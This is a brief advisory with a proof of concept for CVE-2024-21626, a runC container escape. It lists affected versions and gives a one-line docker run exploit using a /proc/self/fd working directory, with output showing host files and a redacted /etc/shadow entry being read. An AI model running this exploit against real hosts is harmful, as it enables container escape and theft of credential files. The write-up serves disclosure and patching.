CVE-2024-21626

RunC, a container runtime component, published version 1.1.12 to fix CVE-2024-21626 at 31, Jan 2024, which leads to escaping from containers.

Affected Versions

runC v1.0.0-rc93 - 1.1.11
containerd 1.4.7 - 1.6.27 and 1.7.0 - 1.7.12
Docker <=25.0.1

Proof of Concept

Prerequisites

User must be in the docker group
RunC must be running a vulnerable version

Exploitation Method

Start a new container and set the working directory to /proc/self/fd/<fd> (where <fd> represents the file descriptor for /sys/fs/cgroup on the host filesystem, typically 7 or 8).

N/ABASH

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

Example Output

Once exploited, the container provides access to the host filesystem:

N/ABASH

root@7185badc969c:../../..# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
 
root@7185badc969c:../../..# ls -al
total 88
drwxr-xr-x  19 root root  4096 Oct 31 11:20 .
drwxr-xr-x  19 root root  4096 Oct 31 11:20 ..
...
drwxr-xr-x 199 root root 12288 Jan 26 11:22 etc
...
 
root@7185badc969c:../../..# cat etc/shadow
user:$y$ZZZ$XXXX:19661:0:99999:7:::

The vulnerability allows reading sensitive host files like /etc/shadow from within the container.

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝